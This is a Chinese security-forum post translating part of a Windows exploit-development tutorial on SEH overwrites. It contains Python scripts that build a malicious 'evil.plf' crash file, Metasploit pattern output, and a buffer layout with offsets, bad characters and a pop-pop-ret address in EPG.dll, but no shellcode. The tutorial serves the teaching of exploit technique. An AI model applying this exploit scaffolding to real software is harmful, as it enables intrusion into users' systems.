[翻译]Windows Exploit开发系列教程第三部分：Structured Exception Handler (SEH)-外文翻译-看雪-安全社区|安全招聘|kanxue.com

[翻译]Windows Exploit开发系列教程第三部分：Structured Exception Handler (SEH)

发表于: 2015-12-31 21:39 18525

[翻译]Windows Exploit开发系列教程第三部分：Structured Exception Handler (SEH)

Netfairy

2015-12-31 21:39

18525

#!/usr/bin/python -w
filename="evil.plf"
buffer = "A"*2000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

root@bt:~/Desktop# cd /pentest/exploits/framework/tools/
root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 2000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4A
d5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah
0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5
[...snip...]
f5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj
0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5
Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co

#!/usr/bin/python -w
  
filename="evil.plf"
 
#---------------------------------------------------------------------------#
# (*) badchars = '\x00\x0A\x0D\x1A'                                         #
#                                                                           #
# offset to: (2) nseh 608-bytes, (1) seh 112-bytes                          #
# (2) nseh = ????                                                           #
# (1) seh = 0x61617619 : pop esi # pop edi # ret  | EPG.dll                 #
# (3) Shellcode space = 1384-bytes                                          #
#---------------------------------------------------------------------------#
 
buffer = "A"*608 + "B"*4 + "\x19\x76\x61\x61" + "D"*1384
  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

登录后可查看完整内容

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

上传的附件：

image1.png （11.09kb，4次下载）
image2.png （9.57kb，5次下载）
image3.png （47.30kb，22次下载）
image4.png （61.87kb，13次下载）
image5.png （77.06kb，16次下载）
image6.png （66.02kb，10次下载）
image7.png （69.34kb，7次下载）
image8.png （65.71kb，6次下载）
image9.png （125.08kb，9次下载）

收藏・8

免费・3

支持

最新回复 (2)
qweasdasde 雪币： 251 活跃值： (302) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 77 粉丝 6 关注私信	qweasdasde 1 2 楼感谢分享~ 2016-1-2 10:44 0
EvilKnight 雪币： 388 活跃值： (707) 能力值： ( LV9，RANK：170 ) 在线值：发帖 22 回帖 618 粉丝 16 关注私信	EvilKnight 4 3 楼感谢分享 2018-12-7 16:00 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

Netfairy

发帖

242

回帖

530

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区

最新回复 (2)
qweasdasde 雪币： 251 活跃值： (302) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 77 粉丝 6 关注私信	qweasdasde 1 2 楼感谢分享~ 2016-1-2 10:44 0
EvilKnight 雪币： 388 活跃值： (707) 能力值： ( LV9，RANK：170 ) 在线值：发帖 22 回帖 618 粉丝 16 关注私信	EvilKnight 4 3 楼感谢分享 2018-12-7 16:00 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复